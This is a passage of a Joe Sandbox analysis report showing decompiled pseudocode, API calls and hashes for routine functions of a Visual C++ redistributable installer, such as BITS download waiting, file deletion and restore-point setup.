                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: _memcpy_s$Heap$AllocateProcess
                                                                          • String ID: Failed to allocate memory for message.$feclient.dll$pipe.cpp
                                                                          • API String ID: 886498622-766083570
                                                                          • Opcode ID: 00672b2342fb54963646b72b8b05d89f2ca793909e34862d71d10a989039e8d6
                                                                          • Instruction ID: bf0cd13dd0df4b3864d98b29120766d5e5b529deba6d51462066cc47df021434
                                                                          • Opcode Fuzzy Hash: 00672b2342fb54963646b72b8b05d89f2ca793909e34862d71d10a989039e8d6
                                                                          • Instruction Fuzzy Hash: D01151B260031DABDB01AF94DC86DDBB3ADEF09710F00452AFA019B142EB70DA54C7E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 70%
                                                                          			E0003DB67(void* __ecx, intOrPtr _a4) {
                                                                          				void* _v8;
                                                                          				struct tagMSG _v36;
                                                                          				void* _t13;
                                                                          				void* _t15;
                                                                          				signed short _t19;
                                                                          				void* _t24;
                                                                          				signed int _t26;
                                                                          				struct HWND__* _t33;
                                                                          
                                                                          				_t24 = __ecx;
                                                                          				_t33 = 0;
                                                                          				_t26 = 7;
                                                                          				_v8 =  *((intOrPtr*)(__ecx + 0x28));
                                                                          				memset( &_v36, 0, _t26 << 2);
                                                                          				while(1) {
                                                                          					_t13 = MsgWaitForMultipleObjects(1,  &_v8, _t33, 0x3e8, 0x4ff) - _t33;
                                                                          					if(_t13 == 0) {
                                                                          						break;
                                                                          					}
                                                                          					_t15 = _t13 - 1;
                                                                          					if(_t15 == 0) {
                                                                          						PeekMessageW( &_v36, _t33, _t33, _t33, _t33);
                                                                          						continue;
                                                                          					} else {
                                                                          						if(_t15 != 0x101) {
                                                                          							_t19 = GetLastError();
                                                                          							_t36 =  <=  ? _t19 : _t19 & 0x0000ffff | 0x80070000;
                                                                          							_t33 =  >=  ? 0x80004005 :  <=  ? _t19 : _t19 & 0x0000ffff | 0x80070000;
                                                                          							E000137D3(0x80004005, "bitsengine.cpp", 0xc4, _t33);
                                                                          							_push("Failed while waiting for download.");
                                                                          							_push(_t33);
                                                                          							E0005012F();
                                                                          						} else {
                                                                          							E0003DA45(_t24, _a4);
                                                                          							continue;
                                                                          						}
                                                                          					}
                                                                          					break;
                                                                          				}
                                                                          				return _t33;
                                                                          			}












                                                                          APIs
                                                                          • MsgWaitForMultipleObjects.USER32 ref: 0003DB95
                                                                          • PeekMessageW.USER32 ref: 0003DBBF
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0003DD8F,00000000,?,?,?,00000001,00000000), ref: 0003DBC7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastMessageMultipleObjectsPeekWait
                                                                          • String ID: @Met$Failed while waiting for download.$bitsuser.cpp
                                                                          • API String ID: 435350009-1341489405
                                                                          • Opcode ID: f3ab3f22d054e8dd01705f8d986105a0656406734f3443844f8be62c83254c8e
                                                                          • Instruction ID: 46615a2bdd67d1b0de886a9fc378dca357ec8eeafc2ccbcddf10e82da08982d3
                                                                          • Opcode Fuzzy Hash: f3ab3f22d054e8dd01705f8d986105a0656406734f3443844f8be62c83254c8e
                                                                          • Instruction Fuzzy Hash: 59110C73B45325BBE7215AB9AC45EDFBBECEF04721F010126FE05E61C0D6649E0085E4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00053B4A(void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr* _a28) {
                                                                          				struct _SHELLEXECUTEINFOW _v64;
                                                                          				void* _t31;
                                                                          				intOrPtr* _t38;
                                                                          				void* _t40;
                                                                          
                                                                          				_t40 = 0;
                                                                          				E0003F670(__edi,  &_v64, 0, 0x3c);
                                                                          				_v64.hwnd = _a24;
                                                                          				_v64.lpVerb = _a12;
                                                                          				_v64.lpFile = _a4;
                                                                          				_v64.lpParameters = _a8;
                                                                          				_v64.lpDirectory = _a16;
                                                                          				_v64.nShow = _a20;
                                                                          				_v64.cbSize = 0x3c;
                                                                          				_v64.fMask = 0x540;
                                                                          				if(ShellExecuteExW( &_v64) != 0) {
                                                                          					_t38 = _a28;
                                                                          					if(_t38 == 0) {
                                                                          						goto L2;
                                                                          					} else {
                                                                          						 *_t38 = _v64.hProcess;
                                                                          						_t31 = 0;
                                                                          						_v64.hProcess = 0;
                                                                          					}
                                                                          				} else {
                                                                          					_t43 =  <=  ? GetLastError() : _t35 & 0x0000ffff | 0x80070000;
                                                                          					_t40 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t35 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "shelutil.cpp", 0x3a, _t40);
                                                                          					L2:
                                                                          					_t31 = _v64.hProcess;
                                                                          				}
                                                                          				if(_t31 != 0) {
                                                                          					CloseHandle(_t31);
                                                                          				}
                                                                          				return _t40;
                                                                          			}








                                                                          APIs
                                                                          • ShellExecuteExW.SHELL32(?), ref: 00053B98
                                                                          • GetLastError.KERNEL32(?,?,00000000), ref: 00053BA2
                                                                          • CloseHandle.KERNEL32(?,?,?,00000000), ref: 00053BD5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseErrorExecuteHandleLastShell
                                                                          • String ID: <$@Met$shelutil.cpp
                                                                          • API String ID: 3023784893-479485811
                                                                          • Opcode ID: 5700fa581ebdf362b976138436ad7f1c96701e95da2d2fb1f42b5a6f44470af2
                                                                          • Instruction ID: 3ce4e87d3c62c1321e6085c7ebd75df45fe8a17e52a7efe1d13ec8712f0265f6
                                                                          • Opcode Fuzzy Hash: 5700fa581ebdf362b976138436ad7f1c96701e95da2d2fb1f42b5a6f44470af2
                                                                          • Instruction Fuzzy Hash: 5F11EAB5E01219AFEB50DFA9D845ADE7BF8AF08351F004125FD09E7350E7349A148BA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 62%
                                                                          			E00015E0B(void* __ebx, void* __edx, intOrPtr _a8) {
                                                                          				signed int _v8;
                                                                          				short _v40;
                                                                          				long _v44;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t10;
                                                                          				signed short _t22;
                                                                          				void* _t25;
                                                                          				signed int _t26;
                                                                          				void* _t32;
                                                                          				void* _t33;
                                                                          				void* _t34;
                                                                          				intOrPtr _t35;
                                                                          				void* _t36;
                                                                          				signed int _t40;
                                                                          
                                                                          				_t32 = __edx;
                                                                          				_t25 = __ebx;
                                                                          				_t10 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t10 ^ _t40;
                                                                          				_t35 = _a8;
                                                                          				_t26 = 8;
                                                                          				_t33 =  &_v40;
                                                                          				_v44 = 0x10;
                                                                          				memset(_t33, 0, _t26 << 2);
                                                                          				_t34 = _t33 + _t26;
                                                                          				if(GetComputerNameW( &_v40,  &_v44) != 0) {
                                                                          					_t36 = E000302F4(_t35,  &_v40, 0);
                                                                          					if(_t36 < 0) {
                                                                          						_push("Failed to set variant value.");
                                                                          						goto L4;
                                                                          					}
                                                                          				} else {
                                                                          					_t22 = GetLastError();
                                                                          					_t39 =  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
                                                                          					_t36 =  >=  ? 0x80004005 :  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "variable.cpp", 0x70d, _t36);
                                                                          					_push("Failed to get computer name.");
                                                                          					L4:
                                                                          					_push(_t36);
                                                                          					E0005012F();
                                                                          				}
                                                                          				return E0003DE36(_t25, _v8 ^ _t40, _t32, _t34, _t36);
                                                                          			}




















                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ComputerErrorLastName
                                                                          • String ID: @Met$Failed to get computer name.$Failed to set variant value.$variable.cpp
                                                                          • API String ID: 3560734967-712805440
                                                                          • Opcode ID: c5a201c0c9bc17c4434bc4d74dec3408ab9bb598083ad72a7c61f81f3b61577d
                                                                          • Instruction ID: 66b22d9bb771858c76797c1ffc5d32758211544c7836aad143a967e487aee260
                                                                          • Opcode Fuzzy Hash: c5a201c0c9bc17c4434bc4d74dec3408ab9bb598083ad72a7c61f81f3b61577d
                                                                          • Instruction Fuzzy Hash: DD01E532E40728ABE710EAA49C01AEF77E8EB48711F400116FD04FB180DA74AE4886E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 61%
                                                                          			E00016644(void* __ebx, void* __edx, void* __edi, intOrPtr _a8) {
                                                                          				signed int _v8;
                                                                          				short _v528;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t7;
                                                                          				signed short _t18;
                                                                          				void* _t21;
                                                                          				void* _t26;
                                                                          				intOrPtr _t28;
                                                                          				void* _t29;
                                                                          				signed int _t33;
                                                                          
                                                                          				_t27 = __edi;
                                                                          				_t26 = __edx;
                                                                          				_t21 = __ebx;
                                                                          				_t7 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t7 ^ _t33;
                                                                          				_t28 = _a8;
                                                                          				E0003F670(__edi,  &_v528, 0, 0x208);
                                                                          				if(GetTempPathW(0x104,  &_v528) != 0) {
                                                                          					_t29 = E000302F4(_t28,  &_v528, 0);
                                                                          					if(_t29 < 0) {
                                                                          						_push("Failed to set variant value.");
                                                                          						goto L4;
                                                                          					}
                                                                          				} else {
                                                                          					_t18 = GetLastError();
                                                                          					_t32 =  <=  ? _t18 : _t18 & 0x0000ffff | 0x80070000;
                                                                          					_t29 =  >=  ? 0x80004005 :  <=  ? _t18 : _t18 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "variable.cpp", 0x757, _t29);
                                                                          					_push("Failed to get temp path.");
                                                                          					L4:
                                                                          					_push(_t29);
                                                                          					E0005012F();
                                                                          				}
                                                                          				return E0003DE36(_t21, _v8 ^ _t33, _t26, _t27, _t29);
                                                                          			}















                                                                          APIs
                                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 0001667D
                                                                          • GetLastError.KERNEL32 ref: 00016687
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastPathTemp
                                                                          • String ID: @Met$Failed to get temp path.$Failed to set variant value.$variable.cpp
                                                                          • API String ID: 1238063741-1426630962
                                                                          • Opcode ID: 16c29cc182b7492b35e1facea1404faf0066791e718a653d8cd673971f16aef7
                                                                          • Instruction ID: f4e2d421c5f3919f2c39a38747374f36cbbd40ffb0bb80ccd387db6405ae3d7c
                                                                          • Opcode Fuzzy Hash: 16c29cc182b7492b35e1facea1404faf0066791e718a653d8cd673971f16aef7
                                                                          • Instruction Fuzzy Hash: C101D672F417396BF720EBA85C06FEB739C9B00711F000166FD04FB182EA659E4886D5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 68%
                                                                          			E00054038(void* __ecx, void* __eflags, WCHAR* _a4) {
                                                                          				signed char _v8;
                                                                          				void* _t22;
                                                                          
                                                                          				_v8 = _v8 | 0xffffffff;
                                                                          				_t22 = 0;
                                                                          				if(E00054315(_a4,  &_v8) != 0) {
                                                                          					if((_v8 & 0x00000007) == 0 || SetFileAttributesW(_a4, 0x80) != 0) {
                                                                          						L5:
                                                                          						if(DeleteFileW(_a4) == 0) {
                                                                          							_t22 =  <=  ? GetLastError() : _t14 & 0x0000ffff | 0x80070000;
                                                                          							if(_t22 < 0) {
                                                                          								_push(_t22);
                                                                          								_push(0x5c2);
                                                                          								goto L8;
                                                                          							}
                                                                          						}
                                                                          					} else {
                                                                          						_t22 =  <=  ? GetLastError() : _t14 & 0x0000ffff | 0x80070000;
                                                                          						if(_t22 >= 0) {
                                                                          							goto L5;
                                                                          						} else {
                                                                          							_push(_t22);
                                                                          							_push(0x5bc);
                                                                          							L8:
                                                                          							_push("fileutil.cpp");
                                                                          							E000137D3(_t14);
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				return _t22;
                                                                          			}






                                                                          APIs
                                                                            • Part of subcall function 00054315: FindFirstFileW.KERNEL32(00038FFA,?,000002C0,00000000,00000000), ref: 00054350
                                                                            • Part of subcall function 00054315: FindClose.KERNEL32(00000000), ref: 0005435C
                                                                          • SetFileAttributesW.KERNEL32(00038FFA,00000080,00000000,00038FFA,000000FF,00000000,?,?,00038FFA), ref: 00054067
                                                                          • GetLastError.KERNEL32(?,?,00038FFA), ref: 00054071
                                                                          • DeleteFileW.KERNEL32(00038FFA,00000000,00038FFA,000000FF,00000000,?,?,00038FFA), ref: 00054090
                                                                          • GetLastError.KERNEL32(?,?,00038FFA), ref: 0005409A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: File$ErrorFindLast$AttributesCloseDeleteFirst
                                                                          • String ID: @Met$fileutil.cpp
                                                                          • API String ID: 3967264933-2299628883
                                                                          • Opcode ID: 1a5556473779fb7c612e6ef772992ce20dc114cc502674b4d4ebe77f3845718c
                                                                          • Instruction ID: 0911ffe306115ebb78f74f7a86ecb738846d8e20ad4d15345d9cb60f02b70188
                                                                          • Opcode Fuzzy Hash: 1a5556473779fb7c612e6ef772992ce20dc114cc502674b4d4ebe77f3845718c
                                                                          • Instruction Fuzzy Hash: E8019E31A01725A7E7716AB98D08AEB7AD8EF007AAF104211FE05E60E0DB21DE8495E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 77%
                                                                          			E00059555() {
                                                                          				intOrPtr _t1;
                                                                          				_Unknown_base(*)()* _t3;
                                                                          				void* _t5;
                                                                          				_Unknown_base(*)()* _t6;
                                                                          				struct HINSTANCE__* _t14;
                                                                          
                                                                          				_t1 =  *0x7b708; // 0x0
                                                                          				if(_t1 != 1) {
                                                                          					if(_t1 == 0) {
                                                                          						_t14 = GetModuleHandleW(L"KERNEL32.DLL");
                                                                          						if(_t14 != 0) {
                                                                          							_t3 = GetProcAddress(_t14, "AcquireSRWLockExclusive");
                                                                          							if(_t3 == 0) {
                                                                          								goto L5;
                                                                          							} else {
                                                                          								 *0x7b70c = _t3;
                                                                          								_t6 = GetProcAddress(_t14, "ReleaseSRWLockExclusive");
                                                                          								if(_t6 == 0) {
                                                                          									goto L5;
                                                                          								} else {
                                                                          									 *0x7b710 = _t6;
                                                                          								}
                                                                          							}
                                                                          						} else {
                                                                          							L5:
                                                                          							_t14 = 1;
                                                                          						}
                                                                          						asm("lock cmpxchg [edx], ecx");
                                                                          						if(0 != 0 || _t14 != 1) {
                                                                          							if(0 != 1) {
                                                                          								_t5 = 1;
                                                                          							} else {
                                                                          								goto L12;
                                                                          							}
                                                                          						} else {
                                                                          							L12:
                                                                          							_t5 = 0;
                                                                          						}
                                                                          						return _t5;
                                                                          					} else {
                                                                          						return 1;
                                                                          					}
                                                                          				} else {
                                                                          					return 0;
                                                                          				}
                                                                          			}









                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                          • API String ID: 0-1718035505
                                                                          • Opcode ID: 834e4b92f58592a464fe3df43c98e6e9084611b19f8ff5d01dc77ba79e26c0ca
                                                                          • Instruction ID: cf1baf398505cbcd8f48b9600a1156d8e9e6f3443b3cf4f3b7e6407d6cc1b657
                                                                          • Opcode Fuzzy Hash: 834e4b92f58592a464fe3df43c98e6e9084611b19f8ff5d01dc77ba79e26c0ca
                                                                          • Instruction Fuzzy Hash: 0C01D171A45B21DB5FB25EB59C846AB32C8DB81713320913AEE16D6280F71ACC69D7A0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 45%
                                                                          			E0003D5AF(intOrPtr* __ecx, intOrPtr _a4, intOrPtr* _a8) {
                                                                          				void* _t10;
                                                                          				intOrPtr* _t21;
                                                                          				struct _SECURITY_ATTRIBUTES* _t22;
                                                                          
                                                                          				_t21 = __ecx;
                                                                          				_t22 = 0;
                                                                          				_t1 = _t21 + 8; // 0x8
                                                                          				 *__ecx = 0x706ec;
                                                                          				 *(__ecx + 4) = 1;
                                                                          				InitializeCriticalSection(_t1);
                                                                          				_t10 = CreateEventW(0, 1, 0, 0);
                                                                          				 *(_t21 + 0x28) = _t10;
                                                                          				if(_t10 != 0) {
                                                                          					 *((intOrPtr*)(_t21 + 0x20)) = 0;
                                                                          					 *((intOrPtr*)(_t21 + 0x24)) = 0;
                                                                          					 *((intOrPtr*)(_t21 + 0x2c)) = _a4;
                                                                          				} else {
                                                                          					_t25 =  <=  ? GetLastError() : _t14 & 0x0000ffff | 0x80070000;
                                                                          					_t22 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t14 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "bitsengine.cpp", 0x11c, _t22);
                                                                          					_push("Failed to create BITS job complete event.");
                                                                          					_push(_t22);
                                                                          					E0005012F();
                                                                          				}
                                                                          				 *_a8 = _t22;
                                                                          				return _t21;
                                                                          			}







                                                                          APIs
                                                                          • InitializeCriticalSection.KERNEL32(00000008,00000000,00000000,?,0003DD19,?,?,?,?,?,00000001,00000000,?), ref: 0003D5C9
                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,0003DD19,?,?,?,?,?,00000001,00000000,?), ref: 0003D5D4
                                                                          • GetLastError.KERNEL32(?,0003DD19,?,?,?,?,?,00000001,00000000,?), ref: 0003D5E1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CreateCriticalErrorEventInitializeLastSection
                                                                          • String ID: @Met$Failed to create BITS job complete event.$bitsuser.cpp
                                                                          • API String ID: 3069647169-3299338690
                                                                          • Opcode ID: 9c986070d82ac0286686b58037321f7e01331fb0bef71c54b86f86eb020c00a8
                                                                          • Instruction ID: 98a584acf87ce7e85d05c89fb8bd9823deb28b3fa27a4f1436e7c61fcace3b19
                                                                          • Opcode Fuzzy Hash: 9c986070d82ac0286686b58037321f7e01331fb0bef71c54b86f86eb020c00a8
                                                                          • Instruction Fuzzy Hash: 25015E76A01726ABE3109B6AD805A87BADCFF49761F004126FD0CD7641E7B4A810CBE9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00051B28(void* __edx, intOrPtr _a4) {
                                                                          				_Unknown_base(*)()* _t3;
                                                                          				void* _t10;
                                                                          				void* _t11;
                                                                          
                                                                          				_t10 = __edx;
                                                                          				_t11 = E000137D6(L"srclient.dll", 0x7b678);
                                                                          				if(_t11 >= 0) {
                                                                          					_t3 = GetProcAddress( *0x7b678, "SRSetRestorePointW");
                                                                          					 *0x7b67c = _t3;
                                                                          					if(_t3 != 0) {
                                                                          						if(_a4 != 0) {
                                                                          							_t11 = E000515CB(_t10);
                                                                          						}
                                                                          					} else {
                                                                          						_t14 =  <=  ? GetLastError() : _t7 & 0x0000ffff | 0x80070000;
                                                                          						_t11 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t7 & 0x0000ffff | 0x80070000;
                                                                          						E000137D3(0x80004005, "srputil.cpp", 0x1f, _t11);
                                                                          					}
                                                                          					if(_t11 >= 0) {
                                                                          						goto L9;
                                                                          					} else {
                                                                          						goto L7;
                                                                          					}
                                                                          				} else {
                                                                          					_t11 = 0x80004001;
                                                                          					L7:
                                                                          					if( *0x7b678 != 0) {
                                                                          						E00051BB5();
                                                                          					}
                                                                          					L9:
                                                                          					return _t11;
                                                                          				}
                                                                          			}







                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(SRSetRestorePointW,srclient.dll), ref: 00051B53
                                                                          • GetLastError.KERNEL32(?,000148D4,00000001,?,?,0001444C,?,?,?,?,0001535E,?,?,?,?), ref: 00051B62
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AddressErrorLastProc
                                                                          • String ID: @Met$SRSetRestorePointW$srclient.dll$srputil.cpp
                                                                          • API String ID: 199729137-922541083
                                                                          • Opcode ID: e8987b2da2e9676293f97817585389843a833d66c7b05ee3a27e9efd377f758b
                                                                          • Instruction ID: 52b465b276fb3183e712dfbaab9e8be2b51917baac0a49ad92a8a354aec5b56f
                                                                          • Opcode Fuzzy Hash: e8987b2da2e9676293f97817585389843a833d66c7b05ee3a27e9efd377f758b
                                                                          • Instruction Fuzzy Hash: 3FF08676E4072197F73116B58C097E775849F00B66F014121AE05BA292EB6ECC8486E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 71%
                                                                          			E0004A059(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                                                                          				signed int _v8;
                                                                          				int _v12;
                                                                          				void* _v24;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t49;
                                                                          				signed int _t54;
                                                                          				int _t58;
                                                                          				signed int _t60;
                                                                          				short* _t62;
                                                                          				signed int _t66;
                                                                          				short* _t70;
                                                                          				int _t71;
                                                                          				int _t78;
                                                                          				void* _t80;
                                                                          				short* _t81;
                                                                          				signed int _t87;
                                                                          				signed int _t90;
                                                                          				void* _t95;
                                                                          				int _t97;
                                                                          				void* _t98;
                                                                          				short* _t100;
                                                                          				int _t102;
                                                                          				void* _t103;
                                                                          				signed int _t105;
                                                                          				short* _t106;
                                                                          				void* _t109;
                                                                          
                                                                          				_push(__ecx);
                                                                          				_push(__ecx);
                                                                          				_t49 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t49 ^ _t105;
                                                                          				_t102 = _a20;
                                                                          				if(_t102 > 0) {
                                                                          					_t78 = E0004C675(_a16, _t102);
                                                                          					_t109 = _t78 - _t102;
                                                                          					_t4 = _t78 + 1; // 0x1
                                                                          					_t102 = _t4;
                                                                          					if(_t109 >= 0) {
                                                                          						_t102 = _t78;
                                                                          					}
                                                                          				}
                                                                          				_t97 = _a32;
                                                                          				if(_t97 == 0) {
                                                                          					_t97 =  *( *_a4 + 8);
                                                                          					_a32 = _t97;
                                                                          				}
                                                                          				_t54 = MultiByteToWideChar(_t97, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t102, 0, 0);
                                                                          				_v12 = _t54;
                                                                          				if(_t54 == 0) {
                                                                          					L38:
                                                                          					_pop(_t98);
                                                                          					_pop(_t103);
                                                                          					_pop(_t80);
                                                                          					return E0003DE36(_t80, _v8 ^ _t105, _t95, _t98, _t103);
                                                                          				} else {
                                                                          					_t95 = _t54 + _t54;
                                                                          					_t85 = _t95 + 8;
                                                                          					asm("sbb eax, eax");
                                                                          					if((_t95 + 0x00000008 & _t54) == 0) {
                                                                          						_t81 = 0;
                                                                          						__eflags = 0;
                                                                          						L14:
                                                                          						if(_t81 == 0) {
                                                                          							L36:
                                                                          							_t104 = 0;
                                                                          							L37:
                                                                          							E000491C7(_t81);
                                                                          							goto L38;
                                                                          						}
                                                                          						_t58 = MultiByteToWideChar(_t97, 1, _a16, _t102, _t81, _v12);
                                                                          						_t120 = _t58;
                                                                          						if(_t58 == 0) {
                                                                          							goto L36;
                                                                          						}
                                                                          						_t99 = _v12;
                                                                          						_t60 = E00048969(_t81, _t85, _v12, _t120, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
                                                                          						_t104 = _t60;
                                                                          						if(_t104 == 0) {
                                                                          							goto L36;
                                                                          						}
                                                                          						if((_a12 & 0x00000400) == 0) {
                                                                          							_t95 = _t104 + _t104;
                                                                          							_t87 = _t95 + 8;
                                                                          							__eflags = _t95 - _t87;
                                                                          							asm("sbb eax, eax");
                                                                          							__eflags = _t87 & _t60;
                                                                          							if((_t87 & _t60) == 0) {
                                                                          								_t100 = 0;
                                                                          								__eflags = 0;
                                                                          								L30:
                                                                          								__eflags = _t100;
                                                                          								if(__eflags == 0) {
                                                                          									L35:
